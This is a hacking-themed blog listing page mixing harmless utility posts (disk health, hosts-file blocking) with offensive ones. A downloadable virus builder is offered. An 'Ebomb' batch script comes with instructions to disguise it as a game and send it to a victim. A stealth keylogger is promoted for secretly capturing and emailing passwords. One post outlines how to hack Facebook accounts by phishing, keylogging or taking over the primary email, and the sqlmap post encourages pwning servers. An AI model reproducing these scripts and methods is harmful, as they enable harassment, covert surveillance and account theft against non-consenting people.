Showing posts with label General Post. Show all posts
Showing posts with label General Post. Show all posts
Saturday, 19 January 2013
Tuesday, 15 January 2013
Monitor your hardrives health status with crystaldiskinfo.
Data recovery is a costly. It’s always better to have backups, but
what about the reliability of our backup drives? There is a way to find
it out. Each hard drive, both internal and external, stores details
about it’s health without any user intervention. It’s called S.M.A.R.T.
(Self-Monitoring, Analysis and Reporting Technology)
which monitors several parameters, which helps to anticipate failures.
S.M.A.R.T can detect only predictable failures which comes from normal
wear and tear of mechanical components, and degradation of disk surface.
CrystalDiskInfo is a free system utility to read your hard disk’s SMART
data easily.
monitor-your-hardrives-health-status
Download CrystalDiskInfo
OS : Windows 7/2008/Vista/2003/XP/2000, x86/WoW64
- IDE, SATA hard drives even on USB interface is supported.
- can detect disks on RAID array.
- less hungry on system resources.
Power-On Hours (POH) : Count of hours in power-on state. The raw value of this attribute shows total count of hours (or minutes, or seconds, depending on manufacturer) in power-on statesource: wikipedia.com
Power Cycle Count : This attribute indicates the count of full hard disk power on/off cycles.
Temperature : Current internal temperature and many more.
Download CrystalDiskInfo
OS : Windows 7/2008/Vista/2003/XP/2000, x86/WoW64
Online Radio of Singapore
The Singapore Radio FM broadcasts in various Singaporean languages such asEnglish, Mandarin, Malay, Tamil and other international languages. The Radio
channels streaming news, music and infotainment from band artists, classical
music, contemporary music to modern music programmers such hits
music, jazz, mix music, hot music, best music, pop music and many more. Enjoy
yourself while listening to radio Singapore online.
Search Bar Form for Blogger
This searches all the posts on your blog, and
displays them by latest posts first. Inside the search bar you will find the
text "Search this Site", this can easily be changed to any text you
desire. Such as "Search my Site", "Search", "Type andHit Enter", etc. Just simply replace the code. You can also change the
text "Go" on the button to something like "Search",
"Find", etc.
<form id="searchThis" action="/search" style="display: inline;" method="get"><input onfocus="if(this.value==this.defaultValue)this.value='';" value="Search this Site" type="text" id="searchBox" onblur="if(this.value=='')this.value=this.defaultValue;" style="width: 150px;color:#636363;" vinput="" name="q"> <input id="searchButton" value="Go" type="submit"></form>
Saturday, 3 November 2012
PC Security Threats | Malwares
Computer security threats or Malicious code or Malwares comes in a wide variety of forms and is distributed through an ever growing number of delivery mechanisms. In general malicious program is any software that impedes the normal operation of a computer or networking device. This software most often executes without the user's consent.
Understanding how malwares works can help you develop defensive strategies, select
computer security products and train employees on how to identify potential threats.
computer security products and train employees on how to identify potential threats.
Types of computer security threats
These can be roughly broken down into types according to the malware's method of operation. Anti-"virus" software, despite its name, is able to detect all of these types of malware. There are following malware types.
- E-mail and other types of viruses
- Trojans and other backdoors
- Worms
- Blended threats
- Time bombs
- Spyware
- Adware
- Stealware
- Zombies
when a piece of malicious code starts infecting large number of computers, it is said to be 'in wild'.
Threat level of these malwares refers to it's potential to spread and infect computers. Threat level can be shown in 4 catagories.
- NO - may not function well
- Low - requires human assistance in replicating and moving from computer to computer
- Medium - slow infection speed and little damage
- High - great infection speed and do considerable damage.
wild list or threat list refers to malicious code that is wandering around the internet infecting computers. An archive of wild lists and information about the organisation that maintains the list are available at www.wildlist.org
Make Virus using V-Maker.
Today i am going to post about a virus creating tool. This tool is Virus Matic 2010 or in short V-Maker
Main Feature of V-Maker
You can create your own prank files/viruses with ease by V-Maker.
- Disable Mouse and Keyboard
- Disable Regedit
- Delete System32
- Block Site
- Disable Task Manager
- Take Screen Shot Of Victim PC
- Message Box (When User Click on Virus)
- Automatically Download Start (When User click on virus download start automatic)
- USB Spread
Download V-Maker
Block any website on your computer.
There are many people who want some website unaccessible from their computer. Most of the parents want to block some websites on their computer system. Here i am going to write a well known an easy way to do this.
Steps:
1- go to C:\WINDOWS\system32\drivers\etc
2- Find a file named "HOSTS"
3- Open this file in notepad
4- Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , Now www.xyz.com site will no longer be accessable.
1- go to C:\WINDOWS\system32\drivers\etc
2- Find a file named "HOSTS"
3- Open this file in notepad
4- Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , Now www.xyz.com site will no longer be accessable.
you can add as many url of websites under this by increasing last no. of ip
as
127.0.0.3 www.abcxyz.com
127.0.0.4 www.xyzas.com
127.0.0.4 www.xyzas.com
an so on.
To unblock these website only erase the line corresponding to that website.
Make a Ebomb(a virus)

Ebomb a virus for fun
This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "www.ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D
(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "prohacks.blogspot.com"
start firefox "www.proshack.blogspot.com"
start notepad
start iexplore "prohacks.blogspot.com"
start firefox "www.proshack.blogspot.com"
start notepad
and then simply save it as "anyname.bat"
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "www.ethicalhack4u.blogspot.com"
start firefox "www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D
(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "prohacks.blogspot.com"
start firefox "www.proshack.blogspot.com"
start notepad
start iexplore "prohacks.blogspot.com"
start firefox "www.proshack.blogspot.com"
start notepad
and then simply save it as "anyname.bat"
Download Advanced IP Scanner
Advanced IP Scanner 2.0 Portable | 10.2 MB
Advanced IP Scanner is a fast LAN scanner for Windows. It is very easy to use and give you various types of information about local network computers in a few seconds. It gives you one-click access to many useful functions – remote shutdown and wake up, Radmin integration and more! Powered with multi-thread scan technology, this program can scan hundreds computers per second, allowing you to scan ‘C’ or even ‘B’ class network even from your modem connection.
Features of Advanced IP Scanner:
· Fast and stable multi-threaded IP scanning: You can scan hundreds of IP addresses simultaneously and with great speed – on Pentium-based machines Advanced IP Scanner scans class “B” and “C” networks in a few seconds! You can configure Advanced IP Scanner to scan in many priority levels, set number of maximum threads and so on.
· Remote shutdown: This shuts down any remote machine with NT or Win2k operating system. You can use your default access rights or specify login and password to shutdown.
· Wake-On-LAN: You can wake any machine remotely, if “Wake-on-LAN” feature is supported by your network card.
· Group operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.
· Lists of computers saving and loading: This enables you to perform operations with a specific list of computers. No problems – just save a list of machines you need and Advanced IP Scanner will load it at start up automatically.
· Radmin integration: This enables you to connect via Radmin (if it’s installed) to remote computers with just one click.
Download Advanced IP Scanner 2.0
How to protect your system from USB viruses
Autorun Virus Remover can detect and clean hundreds of usb/autorun viruses and it will block viruses and trojans trying to attack when USB device is inserted. Autorun Virus Remover provides 100% protection against any malicious programs trying to attack via USB storage(USB drive?USB stick?pen drive?flash drive?flash card?secure digital card?removable storage?portable storage?ipod?media player).
Compare Autorun Virus Remover with other antivirus solutions, you will find out its highlights: Autorun Virus Remover provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. Autorun Virus Remover can detect and clean the usb virus/worm/trojan such as Ravmon,auto.exe in your computer or usb drive,it could solve the problem that unable to open a drive by double clicking. It also removes the leftovers of virus by removing the autorun.inf files and cleaning up your system registry, so you won’t see the autoplay item anymore
Download Autorun virus Remover
SQLMAP-Automatic SQL Injection Tool
Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on theoperating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here:
Windows Portable: sqlmap-0.7_exe.zip
Enjoy !
Trace the location with IP
IP2Location™ is a geo IP solution to help you to identify visitor's geographical location, i.e. country, region, city, latitude, longitude, ZIP code, time zone, connection speed, ISP and domain name, IDD country code, area code, weather station code and name using a proprietary IP address lookup database and technology without invading the Internet user's privacy.
Just go to http://www.ip2location.com/?rid=939 and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.
Just go to http://www.ip2location.com/?rid=939 and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.
1. Country in which the IP is located
2. Region
3. City
4. Latitude/Longitude
5. Zip Code
6. Time Zone
7. Name of the ISP
8. Internet Speed
9. Weather Station
10. Area Code and
11. Domain name associated with the IP address.
Friday, 2 November 2012
Award keylogger Free Download
It records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.
Main Features:
New! Run keylogger as a Windows service
Easy-to-use, even for beginners
Absolutely invisible/stealth mode
Logs accounts and passwords typed in the every application, (Only Award Keylogger Pro can record passwords in IE7/8/9)
Logs message typed in all instant messengers
Visual surveillance, support screenshots view
Slide show for screenshots
Captures the contents behind the asterisks
Captures mouse clicks
Logs websites visited (Award Keylogger Pro only)
Captures AOL/AIM/Yahoo/ICQ chats
Keyword Detection and Notification
Records contents of password protected web pages, including Web Mail messages
Logs Windows Clipboard
Sends log by e-mail
Uploads ALL logs into the separate folders by FTP
Invisible for the firewall program
Invisible in the Windows startup list
Monitors all users of the PC
User friendly HTML file format for emailed logs
Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List
Records Windows 9.x/Me/2000/XP/VISTA logon passwords
Intercepts DOS-box and Java-chat keystrokes
Supports international keyboards
External log viewer
Supports printing of the log
Optimized for Windows XP
Exports log to HTML
Download Award keylogger
Wednesday, 31 October 2012
Common ways to Hack Facebook Account
Facebook account can be hack from one of following ways.
- Facebook Phishing
- By use of Key logger
- Facebook Account hack with get control on Primary email address
Facebook Phishing Attack :
This is one of the most popular methods to hack Facebook account online.also it is the one of the best popular and favorite method for Facebook hackers. Phishing not only allows you to hack Facebook but also can be used to hack any email account. You have to only get the trick used to make a phisher, which i think is very easy. Phishing is one of the easiest methods to foll someone and get Facebook account password. I mention the process for educational purpose only.I will go explaing in details on my next article on How to hack Facebook password.Use Key logger to hack Facebook passwords
Installing key-logger on victims machine and later read key logs to gain access to hack facebook account for free. To Install keylogger, you should have a physical access to victim’s computer.in case, you don’t have , then you can install key-logger remotely.What a key-logger does is it stores the keystrokes into a text log file and then these logs can be used to get required Facebook password and you can hack Facebook Account.
Get access to Primary email address to hack someone’s Facebook account
let say,if you want to gain access to someones account, i think hacking victims email address(Primary email address of Facebook) is easier than hacking of facebook. Most of the users uses 1 gmail or yahoo account email address as as primary email address. A genius hacker can easily gain over victims’ gmail account or yahoo email account.After gaining control over primary email address of facebook, you simply use the “Forgot password” facility that will ask Facebook to send password reset email to your primary email address- which is already hacked.
Thus, your Facebook account password will be reset and to hack Facebook account you already have another alternative as well !!!
Subscribe to:
Posts (Atom)